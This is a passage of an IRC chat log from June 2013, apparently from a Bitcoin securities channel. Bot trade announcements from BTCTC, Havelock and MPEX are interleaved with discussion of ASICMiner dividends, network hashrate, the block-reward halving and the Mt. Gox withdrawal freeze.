mpoe-pr people on staff, to berate idiots over the phone for being idiotic in the hopes they may be pushed to suicide. Jun 20 17:35:08 it's just how banking works, in lalalalnd Jun 20 17:35:19 [BTCTC] [COGNITIVE] 1 @ 0.29782 BTC [+] Jun 20 17:35:24 [BTCTC] [GSDPT] 10 @ 0.002586 = 0.0259 BTC [+] Jun 20 17:35:24 [BTCTC] [COGNITIVE] 2 @ 0.298 = 0.596 BTC [+] Jun 20 17:37:27 [BTCTC] [TAT.ASICMINER] 4 @ 0.028301 = 0.1132 BTC [-] Jun 20 17:40:41 [BTCTC] [TAT.ASICMINER] 6 @ 0.0283 = 0.1698 BTC [-] Jun 20 17:40:53 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [+] Jun 20 17:42:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.02825 = 0.2825 BTC [-] Jun 20 17:42:27 [BTCTC] [TAT.ASICMINER] 9 @ 0.028301 = 0.2547 BTC [+] Jun 20 17:43:07 [BTCTC] [TAT.ASICMINER] 8 @ 0.028301 = 0.2264 BTC [+] Jun 20 17:43:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.0282 = 0.0564 BTC [-] Jun 20 17:43:25 [BTCTC] [ASICMINER-PT] 2 @ 2.831 = 5.662 BTC [-] Jun 20 17:43:54 [BTCTC] [BASIC-MINING] 1 @ 1.19 BTC [-] Jun 20 17:44:35 [BTCTC] [BASIC-MINING] 1 @ 1.2 BTC [+] Jun 20 17:44:36 [BTCTC] [BASIC-MINING] 2 @ 1.2 = 2.4 BTC [+] Jun 20 17:46:08 [BTCTC] [TAT.ASICMINER] 5 @ 0.0282 = 0.141 BTC [-] Jun 20 17:46:55 [BTCTC] [BASIC-MINING] 1 @ 1.25 BTC [+] Jun 20 17:49:06 http://blueseed.co/ Jun 20 17:49:12 bitangels invested in that Jun 20 17:49:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.028899 = 0.1156 BTC [+] Jun 20 17:49:28 http://techcrunch.com/2013/06/19/30-days-in-bitcoin-angel-group-bitangels-doubles-network-to-120-puts-first-100k-into-seasteading-venture-blueseed/ Jun 20 17:49:58 [BTCTC] [TAT.ASICMINER] 12 @ 0.0282 = 0.3384 BTC [-] Jun 20 17:50:16 [BTCTC] [TAT.ASICMINER] 29 @ 0.02818 = 0.8172 BTC [-] Jun 20 17:50:45 [BTCTC] [TAT.ASICMINER] 17 @ 0.027803 = 0.4727 BTC [-] Jun 20 17:51:59 kik Jun 20 17:52:51 [BTCTC] [BASIC-MINING] 1 @ 1.25 BTC [+] Jun 20 17:53:50 [BTCTC] [DMS.SELLING] 1 @ 0.0385 BTC [+] Jun 20 17:54:42 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [+] Jun 20 17:55:23 [BTCTC] [BASIC-MINING] 1 @ 1.25 BTC [+] Jun 20 17:55:31 [BTCTC] [BASIC-MINING] 1 @ 1.29 BTC [+] Jun 20 17:59:10 [BTCTC] [DMS.MINING] 52 @ 0.019258 = 1.0014 BTC [-] Jun 20 18:01:10 [BTCTC] [GSDPT] 1 @ 0.002586 BTC [+] Jun 20 18:02:22 [HAVELOCK] [ASICM] 8 @ 0.02865001 = 0.2292 BTC [-] Jun 20 18:02:23 [HAVELOCK] [ASICM] 3 @ 0.02865 = 0.086 BTC [-] Jun 20 18:02:24 [HAVELOCK] [ASICM] 20 @ 0.0286 = 0.572 BTC [-] Jun 20 18:02:26 [HAVELOCK] [ASICM] 2 @ 0.02850002 = 0.057 BTC [-] Jun 20 18:02:27 [HAVELOCK] [ASICM] 3 @ 0.0285 = 0.0855 BTC [-] Jun 20 18:02:28 [HAVELOCK] [ASICM] 1 @ 0.028499 BTC [-] Jun 20 18:02:29 [HAVELOCK] [ASICM] 59 @ 0.028401 = 1.6757 BTC [-] Jun 20 18:02:30 [HAVELOCK] [ASICM] 25 @ 0.0284 = 0.71 BTC [-] Jun 20 18:03:07 [BTCTC] [ASICMINER-PT] 1 @ 2.831 BTC [-] Jun 20 18:03:26 [BTCTC] [S.DICE-PT] 1 @ 0.0027 BTC [-] Jun 20 18:03:47 [BTCTC] [BASIC-MINING] 1 @ 1.29 BTC [+] Jun 20 18:05:33 [BTCTC] [BASIC-MINING] 1 @ 1.299 BTC [+] Jun 20 18:06:36 [BTCTC] [BITVPS] 10 @ 0.001092 = 0.0109 BTC [-] Jun 20 18:08:00 [BTCTC] [S.DICE-PT] 1 @ 0.00269 BTC [-] Jun 20 18:12:01 [BTCTC] [S.DICE-PT] 1 @ 0.00269 BTC [-] Jun 20 18:12:25 [BTCTC] [S.DICE-PT] 3 @ 0.00269 = 0.0081 BTC [-] Jun 20 18:13:20 [BTCTC] [MININGCO.ETF] 1 @ 0.8199 BTC [+] Jun 20 18:15:54 whats new everyone Jun 20 18:18:27 My asset is new and it needs just one more vote before it goes live! Jun 20 18:18:35 :-P Jun 20 18:19:15 let me guess, a mining bond ? Jun 20 18:19:24 indeed! Jun 20 18:19:24 Wow, impressive :-) Jun 20 18:19:55 now that DMS released and devalued hashes even more than I did, Jun 20 18:19:58 [BTCTC] [PAJKA.BOND] 1 @ 0.062 BTC [-] Jun 20 18:20:01 [BTCTC] [PAJKA.BOND] 1 @ 0.052 BTC [-] Jun 20 18:20:04 [BTCTC] [PAJKA.BOND] 14 @ 0.050001 = 0.7 BTC [-] Jun 20 18:20:05 I have my first turds harassing me Jun 20 18:20:30 it's CRASHING Jun 20 18:20:31 [BTCTC] [PAJKA.BOND] 75 @ 0.05 = 3.75 BTC [-] Jun 20 18:20:37 [BTCTC] [PAJKA.BOND] 4 @ 0.04 = 0.16 BTC [-] Jun 20 18:20:42 [BTCTC] [BASIC-MINING] 2 @ 1.299 = 2.598 BTC [+] Jun 20 18:20:59 TAT.VM is still priced at just 16% under IPO, and DMS.Selling is priced just around mine. Jun 20 18:21:04 [BTCTC] [TAT.ASICMINER] 2 @ 0.0284 = 0.0568 BTC [+] Jun 20 18:21:05 *.Mining Jun 20 18:21:31 [BTCTC] [TAT.ASICMINER] 20 @ 0.0284 = 0.568 BTC [+] Jun 20 18:21:32 [HAVELOCK] [ASICM] 1 @ 0.0288885 BTC [+] Jun 20 18:21:53 ThickAsThieves ironically enough a guy vby the name brendio was drafting the same thing about may 2012 Jun 20 18:21:59 I'm somewhat cautious about the DMS.* assets, though, as they effectively have somewhat of a double exposure. Jun 20 18:22:00 he disappeared tho Jun 20 18:22:33 [BTCTC] [ASICMINER-PT] 1 @ 2.849 BTC [+] Jun 20 18:22:42 the DMS assets are indeed a bit dangerous Jun 20 18:22:50 well-designed sure Jun 20 18:23:05 but I'm really not sure what will happen to the market with them Jun 20 18:23:13 it's like a black hole for mining Jun 20 18:23:23 Yeah, but... Jun 20 18:23:27 ;;bc,stats Jun 20 18:23:30 Current Blocks: 242450 | Current Difficulty: 1.933925827238668E7 | Next Difficulty At Block: 243935 | Next Difficulty In: 1485 blocks | Next Difficulty In About: 1 week, 2 days, 13 hours, 56 minutes, and 7 seconds | Next Difficulty Estimate: 19141290.2032 | Estimated Percent Change: -1.02366 Jun 20 18:23:39 If that keeps happening, it will be a double reverse. Jun 20 18:23:42 [BTCTC] [TAT.ASICMINER] 12 @ 0.0288 = 0.3456 BTC [+] Jun 20 18:23:44 that will go positive by tomorrow Jun 20 18:23:57 Next Difficulty In: 1485 blocks Jun 20 18:23:57 AM hashing was half for a couple days Jun 20 18:24:00 It was almost positive this morning and more negative now. Jun 20 18:24:00 it's back now Jun 20 18:24:00 it's about 1/3 in Jun 20 18:24:09 ;;nethash Jun 20 18:24:12 138964.110417 Jun 20 18:24:27 [BTCTC] [TAT.ASICMINER] 31 @ 0.0288 = 0.8928 BTC [+] Jun 20 18:24:54 True, it's a bit up. The point remains, when nethash flattens out, and it must at some point, it will doubly affect DMS.* assets. Jun 20 18:25:05 [BTCTC] [TAT.ASICMINER] 5 @ 0.0284 = 0.142 BTC [-] Jun 20 18:25:07 [BTCTC] [TAT.ASICMINER] 24 @ 0.028 = 0.672 BTC [-] Jun 20 18:25:24 [BTCTC] [DMS.MINING] 18 @ 0.019257 = 0.3466 BTC [-] Jun 20 18:25:26 [BTCTC] [DMS.MINING] 48 @ 0.019258 = 0.9244 BTC [+] Jun 20 18:25:27 [BTCTC] [DMS.MINING] 34 @ 0.01926 = 0.6548 BTC [+] Jun 20 18:25:28 [BTCTC] [DMS.MINING] 100 @ 0.01927 = 1.927 BTC [+] Jun 20 18:25:30 [BTCTC] [DMS.MINING] 93 @ 0.01929 = 1.794 BTC [+] Jun 20 18:25:35 [BTCTC] [DMS.MINING] 117 @ 0.0193 = 2.2581 BTC [+] Jun 20 18:25:44 [BTCTC] [RSM] 1 @ 0.029 BTC [+] Jun 20 18:26:24 without hardware sales AM div should steady out at .01239 share at this rate, unless they gain or lose market share Jun 20 18:26:38 incorrect Jun 20 18:26:45 AM hashing is already way higher Jun 20 18:26:57 the indicators simply havent averaged out yet Jun 20 18:27:02 what percentage of the network are they Jun 20 18:27:04 http://www.asicminercharts.com/live/ Jun 20 18:27:11 [BTCTC] [RSM] 10 @ 0.029 = 0.29 BTC [+] Jun 20 18:27:23 ok, I was wrong the div will be lower Jun 20 18:27:24 AM avg hashrate for last 12hrs is 36.53TH Jun 20 18:27:25 [BTCTC] [BASIC-MINING] 4 @ 1.299 = 5.196 BTC [+] Jun 20 18:27:52 [BTCTC] [BASIC-MINING] 1 @ 1.3 BTC [+] Jun 20 18:28:08 110783*.018 Jun 20 18:28:11 why is amcharts saying 26TH? Jun 20 18:28:16 [HAVELOCK] [ASICM] 7 @ 0.0288885 = 0.2022 BTC [+] Jun 20 18:28:42 scroll down Jun 20 18:28:49 to the time breakdown Jun 20 18:29:10 http://www.villageinstruments.com/tiki-index.php?page=ViDock Jun 20 18:29:10 huh. Jun 20 18:29:13 Yeah, I know that, but why is the top ones, on a live chart, sying 26 when the average is higher? Jun 20 18:29:23 [HAVELOCK] [ASICM] 8 @ 0.02888888 = 0.2311 BTC [+] Jun 20 18:29:42 [MPEX] [X.IDIFF.SEP] 4013 @ 0.53725 = 2155.9843 BTC Jun 20 18:29:42 [BTCTC] [BITVPS] 10 @ 0.001249 = 0.0125 BTC [+] Jun 20 18:29:45 [BTCTC] [BITVPS] 90 @ 0.00125 = 0.1125 BTC [+] Jun 20 18:29:47 [BTCTC] [BITVPS] 30 @ 0.00131 = 0.0393 BTC [+] Jun 20 18:29:48 [BTCTC] [BITVPS] 118 @ 0.00132 = 0.1558 BTC [+] Jun 20 18:29:49 [BTCTC] [BITVPS] 60 @ 0.0014 = 0.084 BTC [+] Jun 20 18:29:55 [BTCTC] [BITVPS] 100 @ 0.0015 = 0.15 BTC [+] Jun 20 18:29:57 [BTCTC] [BITVPS] 18 @ 0.00153 = 0.0275 BTC [+] Jun 20 18:29:58 well, it is calculated off of luck based on solomining Jun 20 18:30:00 *mjr_* i will try to get in touch with cyrus, you have an email address? Jun 20 18:30:07 the top meter might 48hrs? Jun 20 18:30:09 i dunno Jun 20 18:30:10 6 hours or 12 hours is wrong Jun 20 18:30:16 [BTCTC] [BITVPS] 250 @ 0.00155 = 0.3875 BTC [+] Jun 20 18:30:23 wait. Jun 20 18:30:32 [BTCTC] [BITVPS] 64 @ 0.0016 = 0.1024 BTC [+] Jun 20 18:30:57 hey idiff just beat its record Jun 20 18:31:08 [HAVELOCK] [ASICM] 3 @ 0.02888888 = 0.0867 BTC [+] Jun 20 18:31:10 [HAVELOCK] [ASICM] 59 @ 0.028889 = 1.7045 BTC [+] Jun 20 18:31:10 [HAVELOCK] [ASICM] 314 @ 0.0289 = 9.0746 BTC [+] Jun 20 18:31:11 [HAVELOCK] [ASICM] 194 @ 0.02899 = 5.6241 BTC [+] Jun 20 18:31:12 [HAVELOCK] [SDICE] 1 @ 0.216999 BTC [-] Jun 20 18:31:17 Sure, but I'm still wondering why the live chart shows average for 48 hours (if this is the case) when the non-live chart shows current. Jun 20 18:31:19 [BTCTC] [BITVPS] 36 @ 0.0016 = 0.0576 BTC [+] Jun 20 18:31:22 [BTCTC] [COGNITIVE] 1 @ 0.30249 BTC [+] Jun 20 18:31:28 [BTCTC] [BITVPS] 20 @ 0.0016 = 0.032 BTC [+] Jun 20 18:31:36 [BTCTC] [BITVPS] 14 @ 0.0016 = 0.0224 BTC [+] Jun 20 18:31:37 Just seems backward to me. Jun 20 18:31:45 It is stated the calculation is based on 36 hours of blocks found solo mining Jun 20 18:31:54 ask SMiGuel Jun 20 18:32:15 that is tto short of a time frame, the variance on that is huge Jun 20 18:32:24 Nah, too much of a hassle. I only calculate AM based on network share, not hash rate :-) Jun 20 18:33:18 and the network rate has been holding steady at 139-141 for the last few days Jun 20 18:34:18 It's been lower when AM fell out. I think I saw 135 within the previous 24 hrs. Can't be bothered to look it up, though. Jun 20 18:35:55 [BTCTC] [GSDPT] 30 @ 0.002586 = 0.0776 BTC [+] Jun 20 18:35:55 [BTCTC] [GSDPT] 70 @ 0.002587 = 0.1811 BTC [+] Jun 20 18:36:46 you know the "network rate" is backwards-interpolated based on the actual nethash right ? Jun 20 18:37:10 [BTCTC] [DMS.MINING] 17 @ 0.0193 = 0.3281 BTC [+] Jun 20 18:37:26 based on the actual block frequency and the diff i mean. Jun 20 18:37:57 [BTCTC] [BITVPS] 13 @ 0.00167 = 0.0217 BTC [+] Jun 20 18:38:55 nethash was at 130k for at least 2 days Jun 20 18:39:09 [BTCTC] [BITVPS] 19 @ 0.0017 = 0.0323 BTC [+] Jun 20 18:39:52 [BTCTC] [GSDPT] 7 @ 0.002587 = 0.0181 BTC [+] Jun 20 18:39:54 [BTCTC] [ASICMINER-PT] 1 @ 2.832 BTC [-] Jun 20 18:40:06 [BTCTC] [PAJKA.BOND] 8 @ 0.05 = 0.4 BTC [+] Jun 20 18:40:21 [BTCTC] [BASIC-MINING] 1 @ 1.3 BTC [+] Jun 20 18:40:41 I just go off the number of coins I expect the network to produce, which is more or less constant across a long time period- / percentage of network owned /number of divisible units (shares) + hw sales Jun 20 18:40:56 [BTCTC] [BASIC-MINING] 2 @ 1.35 = 2.7 BTC [+] Jun 20 18:41:10 110783*.21*12/52 Jun 20 18:41:19 it looks like AM is trying to maintain .015+ weekly divs from mining Jun 20 18:41:33 or more specifically Jun 20 18:41:41 the % of nethash that equals that Jun 20 18:42:11 That's about the only thing that could be worse than what they were already doing... Jun 20 18:42:26 ;;calc .015 * 52 / 3 Jun 20 18:42:26 0.26 Jun 20 18:42:58 if they manage to do that til 2017 it's not bad. Jun 20 18:43:13 Why divided by 3? Jun 20 18:43:19 well w/e it sells for Jun 20 18:43:28 Ah. Jun 20 18:43:31 !t bc asicminer-pt Jun 20 18:43:32 I thought I told you not to touch me. Jun 20 18:43:35 meh Jun 20 18:43:59 Yeah, but problem is that we don't know what happens to price when halving becomes more prevalent in mining discussions. Jun 20 18:44:22 that will solve itself Jun 20 18:44:28 just like it did last time Jun 20 18:44:37 everything will solve itself! Jun 20 18:44:40 if you consider your weekly amortisation to be 1% (it is a mining thing after all) then each week is a ~0.013 loss per share. Jun 20 18:45:43 [BTCTC] [RSM] 1 @ 0.029 BTC [+] Jun 20 18:45:43 the next price halving is too far away for me to care about Jun 20 18:45:48 yes, that is correct Jun 20 18:45:48 block halving Jun 20 18:46:03 like 2014 ? Jun 20 18:46:07 2016 Jun 20 18:46:11 I'd put it slightly lower than that, but it's still starting to look like a loss project. My numbers from two months ago are still holding true. Jun 20 18:46:15 that's three years Jun 20 18:46:18 i doubt it seeing how it's per block count Jun 20 18:46:25 we'll be at 0$ or over 9000 by then Jun 20 18:46:26 and everyone was all in a panic in November 2012, it all worked out fine Jun 20 18:46:35 we also dont know what tx fee rewards will be in 2016 Jun 20 18:46:53 it will be what you set in your client Jun 20 18:46:54 ? Jun 20 18:47:02 he means generally. Jun 20 18:47:06 friedcat said that TX fees must be at 15BTC per block to protect Bitcoin. That's a very scary statement. Jun 20 18:47:11 they may be half a btc per block, but they won't be 10 Jun 20 18:47:26 furuknap obviously to his mind bitcoin=his own interest. Jun 20 18:47:32 it will still be 12.5 plus fees Jun 20 18:47:33 Indeed :-) Jun 20 18:47:33 [BTCTC] [DMS.PURCHASE] 4 @ 0.054499 = 0.218 BTC [-] Jun 20 18:47:45 prolly 13-14 total per block, i can see that. Jun 20 18:47:48 even with a block of 15 at $225 Jun 20 18:47:51 20 and over ain't in the books Jun 20 18:48:02 jborkl_ dollars don't entyer into this discussion really. it's all btc Jun 20 18:48:55 well, ok if a hamburger is .1 btc right now Jun 20 18:49:06 and a hamburger is .7 bitcoin in 3 years Jun 20 18:49:11 .07 Jun 20 18:49:11 mp, dollars will have an effect because mining equipment and expenses are still denominated in $. If BTC/$ drops to 10$ then less mining will happen reducing difficulty increasing profits. Jun 20 18:49:31 mining equipment seems to be denominated in btc. Jun 20 18:49:32 uhh Jun 20 18:49:38 then I can still buy my hamburger even with a reward drop Jun 20 18:49:39 If halving effect is 50% then each month, with a price of 3BTC/share, AM 'loses' 0.0340909BTC. Jun 20 18:50:06 really though, the halving simply should not be factored into current investments Jun 20 18:50:07 mp; it isn't. It's sold in BTC, but foundries and designers still need to eat. Jun 20 18:50:11 that's my position Jun 20 18:50:34 It must, or someone will have a rude awakening in 2016 if the block reward doesn't explode from TX fees. Jun 20 18:50:37 all things bitcoin require investors to stay savvy of all factors Jun 20 18:50:42 i don't think it's possible to predict or factor Jun 20 18:50:48 any negative affect of a ahlving Jun 20 18:50:54 will not come into play til that year Jun 20 18:50:56 furuknap the fact x involved party needs to eat is not more a germane point in discussing btc deonomination than in discussing dollar denomination, Jun 20 18:51:00 as nobody eats green paper either Jun 20 18:51:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.028799 = 0.0576 BTC [+] Jun 20 18:51:40 [HAVELOCK] [ASICM] 60 @ 0.0285001 = 1.71 BTC [-] Jun 20 18:51:56 [HAVELOCK] [ASICM] 1 @ 0.0285 BTC [-] Jun 20 18:51:57 [HAVELOCK] [ASICM] 20 @ 0.0285 = 0.57 BTC [-] Jun 20 18:51:59 They don't, but those that get BTC will pay in $ so the exchange rate matters to the extent that it affects whether someone will invest the $200 million required to keep the current hash rate growth up until February 2014. Jun 20 18:52:05 but to me bitcoin is a commodity - I have a barrel of oil - I know what it is worth, but I can not go buy food with it Jun 20 18:52:06 technically speaking the better stuff you eat was paid for in euros. Jun 20 18:52:08 [HAVELOCK] [ASICM] 37 @ 0.028451 = 1.0527 BTC [-] Jun 20 18:52:13 but I can sell it anywhere Jun 20 18:52:16 If you can at most get 10K BTC at $10, you won't invest that. Jun 20 18:52:18 the shittier stuff you eat in yuans Jun 20 18:52:19 [HAVELOCK] [ASICM] 3 @ 0.02845 = 0.0854 BTC [-] Jun 20 18:52:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.028799 BTC [+] Jun 20 18:52:26 [HAVELOCK] [ASICM] 11 @ 0.02841 = 0.3125 BTC [-] Jun 20 18:52:47 [HAVELOCK] [ASICM] 8 @ 0.02898 = 0.2318 BTC [+] Jun 20 18:52:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.0282 BTC [-] Jun 20 18:53:00 not everywhere will take bitcoin and that is not important Jun 20 18:53:02 [BTCTC] [TAT.ASICMINER] 46 @ 0.028003 = 1.2881 BTC [-] Jun 20 18:53:05 [BTCTC] [TAT.ASICMINER] 4 @ 0.028002 = 0.112 BTC [-] Jun 20 18:53:31 [BTCTC] [DMS.PURCHASE] 100 @ 0.054499 = 5.4499 BTC [-] Jun 20 18:54:09 [BTCTC] [DMS.MINING] 1 @ 0.01901 BTC [-] Jun 20 18:55:34 [HAVELOCK] [ASICM] 162 @ 0.0284 = 4.6008 BTC [-] Jun 20 18:55:34 [BTCTC] [DMS.MINING] 7 @ 0.0189 = 0.1323 BTC [-] Jun 20 18:55:34 [BTCTC] [DMS.MINING] 2 @ 0.0188 = 0.0376 BTC [-] Jun 20 18:55:55 [BTCTC] [ASICMINER-PT] 1 @ 2.849 BTC [+] Jun 20 18:56:59 [HAVELOCK] [ASICM] 8 @ 0.0284001 = 0.2272 BTC [+] Jun 20 18:57:00 [HAVELOCK] [ASICM] 1 @ 0.0284 BTC [-] Jun 20 18:57:01 [HAVELOCK] [ASICM] 491 @ 0.02834 = 13.9149 BTC [-] Jun 20 19:01:07 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.005831 = 0.0117 BTC [-] Jun 20 19:01:39 [BTCTC] [DMS.SELLING] 20 @ 0.036001 = 0.72 BTC [-] Jun 20 19:01:42 [BTCTC] [DMS.SELLING] 77 @ 0.036001 = 2.7721 BTC [-] Jun 20 19:03:13 [BTCTC] [MININGCO.ETF] 1 @ 0.8199 BTC [+] Jun 20 19:04:27 [BTCTC] [PAJKA.BOND] 1 @ 0.04301 BTC [-] Jun 20 19:04:41 [BTCTC] [PAJKA.BOND] 10 @ 0.043 = 0.43 BTC [-] Jun 20 19:04:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.028789 BTC [+] Jun 20 19:04:55 [BTCTC] [PAJKA.BOND] 1 @ 0.042 BTC [-] Jun 20 19:05:41 [BTCTC] [S.DICE-PT] 1 @ 0.00271 BTC [+] Jun 20 19:06:01 http://bitbet.us/bet/454/btc-network-difficulty-tops-25-million-by-end/ Jun 20 19:06:03 crazy fucking bet. Jun 20 19:08:01 [BTCTC] [DMS.SELLING] 1 @ 0.03709 BTC [+] Jun 20 19:10:06 [BTCTC] [S.DICE-PT] 99 @ 0.002453 = 0.2428 BTC [-] Jun 20 19:11:36 [BTCTC] [TAT.ASICMINER] 8 @ 0.028787 = 0.2303 BTC [-] Jun 20 19:11:44 Wow, and started almost 4 weeks ago. Jun 20 19:12:18 Some time stamps on the comments would be welcomed. Jun 20 19:15:17 ^ Jun 20 19:16:23 y'all talked about the two week gox USD withdrawal freeze yet? Jun 20 19:16:36 https://mtgox.com/press_release_20130620.html Jun 20 19:17:12 causing price bulge on gox.... I am not sure Gox has a bank that will do USD withdrawals for them... Jun 20 19:18:32 what just happened with BitVPS? price just went up 150%??? Jun 20 19:20:30 fat fingered buy? Jun 20 19:21:10 no, there were a couple steps up Jun 20 19:21:20 so it was not just one big buy Jun 20 19:21:31 kakobrekla ^ Jun 20 19:22:00 deadweasel https://bitcointalk.org/index.php?topic=238790.msg2531219#msg2531219 Jun 20 19:24:50 [BTCTC] [TAT.ASICMINER] 15 @ 0.028786 = 0.4318 BTC [-] Jun 20 19:26:04 so you think fractional reserve is breaking down? Jun 20 19:26:24 [BTCTC] [DMS.MINING] 20 @ 0.018989 = 0.3798 BTC [+] Jun 20 19:27:17 [BTCTC] [BASIC-MINING] 2 @ 1.378 = 2.756 BTC [+] Jun 20 19:27:49 has been for a while. Jun 20 19:33:08 [BTCTC] [DMS.SELLING] 20 @ 0.036 = 0.72 BTC [-] Jun 20 19:33:23 [BTCTC] [DMS.SELLING] 9 @ 0.0359 = 0.3231 BTC [-] Jun 20 19:38:09 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00582 BTC [-] Jun 20 19:38:51 what are they doing with customers funds? Lending them out? Getting 1% in a bank account? Jun 20 19:39:08 i have no idea, tyring to figure out if profit motive is enough for them to remain legit... Jun 20 19:39:23 or if they will just bail on the whole Exchange. Jun 20 19:42:16 [BTCTC] [ASICMINER-PT] 1 @ 2.849 BTC [+] Jun 20 19:48:33 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.005818 = 0.0116 BTC [-] Jun 20 19:50:43 [BTCTC] [BASIC-MINING] 3 @ 1.3785 = 4.1355 BTC [+] Jun 20 19:50:51 [BTCTC] [BASIC-MINING] 2 @ 1.3789 = 2.7578 BTC [+] Jun 20 19:52:47 [BTCTC] [ASICMINER-PT] 2 @ 2.849 = 5.698 BTC [+] Jun 20 19:53:09 [BTCTC] [ASICMINER-PT] 3 @ 2.85 = 8.55 BTC [+] Jun 20 19:53:11 [BTCTC] [ASICMINER-PT] 3 @ 2.857 = 8.571 BTC [+] Jun 20 19:56:47 http://www.nature.com/news/silver-makes-antibiotics-thousands-of-times-more-effective-1.13232 Jun 20 19:57:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.02878 = 0.0863 BTC [-] Jun 20 19:58:23 [BTCTC] [ASICMINER-PT] 1 @ 2.8445 BTC [-] Jun 20 19:58:25 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [-] Jun 20 19:58:30 [BTCTC] [ASICMINER-PT] 8 @ 2.831 = 22.648 BTC [-] Jun 20 19:58:32 [BTCTC] [ASICMINER-PT] 1 @ 2.83 BTC [-] Jun 20 20:07:42 [BTCTC] [DMS.MINING] 1 @ 0.018888 BTC [-] Jun 20 20:09:17 [HAVELOCK] [ASICM] 2 @ 0.028355 = 0.0567 BTC [+] Jun 20 20:09:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.02878 BTC [-] Jun 20 20:09:58 [HAVELOCK] [ASICM] 1 @ 0.0283525 BTC [-] Jun 20 20:10:06 [BTCTC] [DMS.MINING] 4 @ 0.0187 = 0.0748 BTC [-] Jun 20 20:11:16 [BTCTC] [BASIC-MINING] 1 @ 1.200001 BTC [-] Jun 20 20:11:27 [BTCTC] [ASICMINER-PT] 1 @ 2.857 BTC [+] Jun 20 20:11:35 [BTCTC] [ASICMINER-PT] 5 @ 2.858 = 14.29 BTC [+] Jun 20 20:11:37 [BTCTC] [ASICMINER-PT] 3 @ 2.859 = 8.577 BTC [+] Jun 20 20:11:45 [BTCTC] [ASICMINER-PT] 3 @ 2.86 = 8.58 BTC [+] Jun 20 20:11:50 [BTCTC] [ASICMINER-PT] 3 @ 2.867 = 8.601 BTC [+] Jun 20 20:11:58 [BTCTC] [ASICMINER-PT] 1 @ 2.8679 BTC [+] Jun 20 20:12:04 [BTCTC] [ASICMINER-PT] 62 @ 2.868 = 177.816 BTC [+] Jun 20 20:12:16 big buyer Jun 20 20:19:02 [BTCTC] [ASICMINER-PT] 1 @ 2.867 BTC [-] Jun 20 20:19:35 [BTCTC] [RSM] 18 @ 0.029 = 0.522 BTC [+] Jun 20 20:19:36 [BTCTC] [DMS.MINING] 6 @ 0.0187 = 0.1122 BTC [-] Jun 20 20:19:38 [BTCTC] [TAT.ASICMINER] 3 @ 0.02878 = 0.0863 BTC [-] Jun 20 20:19:39 [BTCTC] [DMS.MINING] 1 @ 0.018645 BTC [-] Jun 20 20:19:41 [BTCTC] [DMS.MINING] 3 @ 0.01852 = 0.0556 BTC [-] Jun 20 20:20:39 [BTCTC] [DMS.MINING] 2 @ 0.0177 = 0.0354 BTC [-] Jun 20 20:20:41 [BTCTC] [DMS.MINING] 10 @ 0.017651 = 0.1765 BTC [-] Jun 20 20:20:43 [BTCTC] [DMS.MINING] 30 @ 0.01765 = 0.5295 BTC [-] Jun 20 20:20:45 [BTCTC] [DMS.MINING] 2 @ 0.0176 = 0.0352 BTC [-] Jun 20 20:20:47 [BTCTC] [DMS.MINING] 1 @ 0.0176 BTC [-] Jun 20 20:20:52 [BTCTC] [DMS.MINING] 37 @ 0.0176 = 0.6512 BTC [-] Jun 20 20:20:53 [BTCTC] [DMS.MINING] 30 @ 0.01713 = 0.5139 BTC [-] Jun 20 20:20:55 [BTCTC] [DMS.MINING] 30 @ 0.01712 = 0.5136 BTC [-] Jun 20 20:20:55 [BTCTC] [DMS.MINING] 4 @ 0.01711 = 0.0684 BTC [-] Jun 20 20:20:57 [BTCTC] [DMS.MINING] 3 @ 0.017107 = 0.0513 BTC [-] Jun 20 20:20:57 [BTCTC] [DMS.MINING] 1 @ 0.0171 BTC [-] Jun 20 20:20:59 [BTCTC] [DMS.MINING] 1 @ 0.017001 BTC [-] Jun 20 20:21:01 [BTCTC] [DMS.MINING] 1 @ 0.017001 BTC [-] Jun 20 20:21:02 [BTCTC] [DMS.MINING] 10 @ 0.017001 = 0.17 BTC [-] Jun 20 20:21:04 [BTCTC] [DMS.MINING] 50 @ 0.017 = 0.85 BTC [-] Jun 20 20:21:27 yeesh Jun 20 20:21:30 wasnt me! Jun 20 20:21:39 [BTCTC] [DMS.MINING] 4 @ 0.01711 = 0.0684 BTC [+] Jun 20 20:23:18 [BTCTC] [GSDPT] 15 @ 0.0023 = 0.0345 BTC [-] Jun 20 20:23:30 [BTCTC] [BTC-BOND] 1 @ 0.009998 BTC [+] Jun 20 20:24:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.02878 BTC [-] Jun 20 20:36:27 [BTCTC] [DMS.MINING] 2 @ 0.017999 = 0.036 BTC [+] Jun 20 20:37:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.02878 BTC [-] Jun 20 20:37:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.028786 = 0.0576 BTC [+] Jun 20 20:37:43 [BTCTC] [TAT.ASICMINER] 50 @ 0.028787 = 1.4394 BTC [+] Jun 20 20:38:41 [BTCTC] [ASICMINER-PT] 2 @ 2.867 = 5.734 BTC [-] Jun 20 20:43:54 [BTCTC] [BASIC-MINING] 1 @ 1.250001 BTC [+] Jun 20 20:43:57 [BTCTC] [BASIC-MINING] 3 @ 1.25 = 3.75 BTC [-] Jun 20 20:45:34 [BTCTC] [BASIC-MINING] 5 @ 1.2 = 6 BTC [-] Jun 20 20:45:35 [HAVELOCK] [KCIM] 1 @ 1.020001 BTC [-] Jun 20 20:45:35 [HAVELOCK] [KCIM] 1 @ 1.02 BTC [-] Jun 20 20:46:25 [HAVELOCK] [ASICM] 1 @ 0.02889 BTC [+] Jun 20 20:46:33 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005301 = 0.2651 BTC [-] Jun 20 20:47:19 [HAVELOCK] [HIM] 1 @ 0.27120001 BTC [-] Jun 20 20:47:20 [HAVELOCK] [HIM] 9 @ 0.2712 = 2.4408 BTC 